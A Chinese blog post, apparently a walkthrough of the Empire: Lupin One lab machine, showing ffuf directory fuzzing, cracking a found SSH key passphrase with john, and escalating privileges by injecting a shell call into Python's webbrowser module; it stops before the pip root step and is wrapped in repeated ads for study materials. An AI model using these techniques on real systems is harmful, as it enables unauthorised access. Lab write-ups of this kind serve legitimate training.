先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7
深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新
如果你需要这些资料,可以添加V获取:vip204888 (备注网络安全)
正文
[03:22:02] 403 - 278B - /.htpasswd_test
[03:22:02] 403 - 278B - /.htaccess.save
[03:22:02] 403 - 278B - /.htaccessOLD2
[03:22:02] 403 - 278B - /.htaccess_sc
[03:22:02] 403 - 278B - /.htpasswds
[03:22:02] 403 - 278B - /.httr-oauth
[03:22:02] 403 - 278B - /.htm
[03:22:36] 301 - 314B - /image -> http://192.168.0.133/image/
[03:22:38] 301 - 319B - /javascript -> http://192.168.0.133/javascript/
[03:22:42] 301 - 315B - /manual -> http://192.168.0.133/manual/
[03:22:42] 200 - 208B - /manual/index.html
[03:22:55] 200 - 34B - /robots.txt
[03:22:56] 403 - 278B - /server-status/
[03:22:56] 403 - 278B - /server-status
Task Completed
扫出robots.txt ,访问~myfiles目录,没有什么东西,这里通过其他的目录扫描工具,也没有扫到有用的信息
![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/9ab43c9cfeab440b91b8ab0eef82e469.png)`访问~myfiles`
![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/d214019e63c94f9ba3f653a2263f5012.png)
### 4.ffuf命令
`ffuf是一个用于Web应用程序的模糊测试工具,它可以快速、灵活地查找隐藏的内容、目录或文件`
-u:url
-x:输出高亮
-r:遵循重定向
-w: 字典
┌──(root㉿kali)-[~]
└─# ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u “http://192.168.0.133/~FUZZ”
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.5.0 Kali Exclusive <3
:: Method : GET
:: URL : http://192.168.0.133/~FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
secret [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 36ms]
`扫到secret目录,访问`
![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/169b202ca6e246c9babc3adce2ba1168.png)
你好朋友,我很高兴你找到了我的秘密目录,我创建了这样的与你分享我的创建SSH私钥文件, 它隐藏在这里的某个地方,这样黑客就不会找到它,也不会用快速通道破解我的密码。 我很聪明我知道。 有什么问题就告诉我 你最好的朋友icex64
告诉你要找到ssh密钥,且他的名字是icex64
#### 在这个目录下,继续使用ffuf工具扫描
`.mysecret.txt`
┌──(root㉿kali)-[~]
└─# ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u “http://192.168.0.133/~secret/.FUZZ” -e .txt,.bak,.html,.pub -mc 200
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.5.0 Kali Exclusive <3
:: Method : GET
:: URL : http://192.168.0.133/~secret/.FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
:: Extensions : .txt .bak .html .pub
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200
directory-list-2.3-small.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 4ms]
#.bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 7ms]
or send a letter to Creative Commons, 171 Second Street, .pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 7ms]
#.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 8ms]
#.bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 8ms]
[Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 7ms]
#.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 7ms]
Copyright 2007 James Fisher.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 12ms]
Copyright 2007 James Fisher [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 12ms]
#.pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 12ms]
Attribution-Share Alike 3.0 License. To view a copy of this .bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 13ms]
#.pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 13ms]
#.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 14ms]
Attribution-Share Alike 3.0 License. To view a copy of this .pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 14ms]
Attribution-Share Alike 3.0 License. To view a copy of this .txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 14ms]
or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 13ms]
Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 15ms]
or send a letter to Creative Commons, 171 Second Street, .bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 20ms]
#.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 21ms]
[Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 12ms]
#.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 13ms]
license, visit http://creativecommons.org/licenses/by-sa/3.0/ .txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 21ms]
#.bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 13ms]
Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 18ms]
#.pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 14ms]
or send a letter to Creative Commons, 171 Second Street, .html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 19ms]
#.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 15ms]
[Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 35ms]
This work is licensed under the Creative Commons .pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 35ms]
directory-list-2.3-small.txt.pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 37ms]
license, visit http://creativecommons.org/licenses/by-sa/3.0/ .html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 37ms]
Attribution-Share Alike 3.0 License. To view a copy of this .html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 41ms]
or send a letter to Creative Commons, 171 Second Street, .txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]
license, visit http://creativecommons.org/licenses/by-sa/3.0/ .bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]
directory-list-2.3-small.txt.bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 42ms]
This work is licensed under the Creative Commons .html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 43ms]
Copyright 2007 James Fisher.pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 43ms]
Copyright 2007 James Fisher.bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 44ms]
directory-list-2.3-small.txt.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 45ms]
This work is licensed under the Creative Commons .bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 45ms]
This work is licensed under the Creative Commons .txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 46ms]
directory-list-2.3-small.txt.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 46ms]
Copyright 2007 James Fisher.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 48ms]
This work is licensed under the Creative Commons [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 48ms]
license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 50ms]
license, visit http://creativecommons.org/licenses/by-sa/3.0/ .pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 51ms]
on atleast 3 different hosts [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 40ms]
on atleast 3 different hosts.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 41ms]
on atleast 3 different hosts.bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 38ms]
Priority ordered case sensative list, where entries were found .pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 43ms]
on atleast 3 different hosts.pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]
on atleast 3 different hosts.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]
[Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]
#.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]
#.bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]
[Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 38ms]
#.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 40ms]
#.pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 40ms]
[Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 47ms]
mysecret.txt [Status: 200, Size: 4689, Words: 1, Lines: 2, Duration: 56ms]
:: Progress: [438320/438320] :: Job [1/1] :: 938 req/sec :: Duration: [0:08:00] :: Errors: 0 ::
![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/ec64a7789e1d4bb0a31f03c2cc690972.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/f382ca6e90bb469db2d7b0ca4f46159e.png)
>
> base58解码,是一个ssh私钥
>
>
>
### 5.ssh私钥爆破
#### 1.将私钥写进sh.txt中
![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/eead79469a054160b3b43fb95154cdcf.png)
#### 2.将私钥转换为可以被john爆破的形式
┌──(root㉿kali)-[~]
└─# /usr/bin/ssh2john sh.txt > hash
#### 3.通过John爆破
这里我之前爆破过了
┌──(root㉿kali)-[~]
└─# john --wordlist=/usr/share/wordlists/fasttrack.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
No password hashes left to crack (see FAQ)
┌──(root㉿kali)-[~]
└─# john --show hash
sh.txt:P@55w0rd!
1 password hash cracked, 0 left
### 6.ssh私钥登陆
┌──(root㉿kali)-[~]
└─# ssh -i sh.txt icex64@192.168.0.133
Enter passphrase for key ‘sh.txt’:
Linux LupinOne 5.10.0-8-amd64 #1 SMP Debian 5.10.46-5 (2021-09-23) x86_64
########################################
Welcome to Empire: Lupin One
########################################
Last login: Wed Feb 7 00:46:39 2024 from 192.168.0.130
icex64@LupinOne:~$
### 7.icex64提权
sudo -l
看到一个py文件,arsene用户可以在没有passwd的环境下,使用heist.py,就想到在py中新启动一个arsene,shell环境
icex64@LupinOne:~$ sudo -l
Matching Defaults entries for icex64 on LupinOne:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User icex64 may run the following commands on LupinOne:
(arsene) NOPASSWD: /usr/bin/python3.9 /home/arsene/heist.py
icex64@LupinOne:~$ cat /home/arsene/heist.py
import webbrowser
print (“Its not yet ready to get in action”)
webbrowser.open(“https://empirecybersecurity.co.mz”)
`heist.py文件中引用了webbrowser模块,找一下这个模块`
import webbrowser
print (“Its not yet ready to get in action”)
icex64@LupinOne:~$ find / -name webbrowser.py -type f 2>/dev/null
/usr/lib/python3.9/webbrowser.py
icex64@LupinOne:~$ head /usr/lib/python3.9/webbrowser.py
#! /usr/bin/env python3
“”“Interfaces for launching and remotely controlling Web browsers.”“”
Maintained by Georg Brandl.
import os
import shlex
import shutil
import sys
import subprocess
看到模块中引用了,os模块,想到通过os.system(“/bin/bash”),新启一个shell,将os.system(“/bin/bash”)加入到webbrowser.py中
使用vi编辑器
icex64@LupinOne:/tmp$ head -n 20 /usr/lib/python3.9/webbrowser.py
#! /usr/bin/env python3
“”“Interfaces for launching and remotely controlling Web browsers.”“”
Maintained by Georg Brandl.
import os
import shlex
import shutil
import sys
import subprocess
import threading
os.system(“/bin/bash”)
all = [“Error”, “open”, “open_new”, “open_new_tab”, “get”, “register”]
`加入完成后运行`
icex64@LupinOne:/tmp$ sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py
arsene@LupinOne:/tmp$ id
uid=1000(arsene) gid=1000(arsene) groups=1000(arsene),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
成功到arsene用户
### 8.arsene提权
`pip提权`
[**https://gtfobins.github.io/gtfobins/pip/**]( )
arsene@LupinOne:/tmp$ sudo -l
Matching Defaults entries for arsene on LupinOne:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User arsene may run the following commands on LupinOne:
(root) NOPASSWD: /usr/bin/pip
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!
王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。
对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
【完整版领取方式在文末!!】
93道网络安全面试题
内容实在太多,不一一截图了
黑客学习资源推荐
最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
😝朋友们如果有需要的话,可以联系领取~
1️⃣零基础入门
① 学习路线
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
② 路线对应学习视频
同时每个成长路线对应的板块都有配套的视频提供:
2️⃣视频配套工具&国内外网安书籍、文档
① 工具
② 视频
③ 书籍
资源较为敏感,未展示全面,需要的最下面获取
② 简历模板
因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
述](https://img-blog.csdnimg.cn/111f5462e7df433b981dc2430bb9ad39.png#pic_center)
② 简历模板
因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)
[外链图片转存中…(img-dLW897Xu-1713418663929)]
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!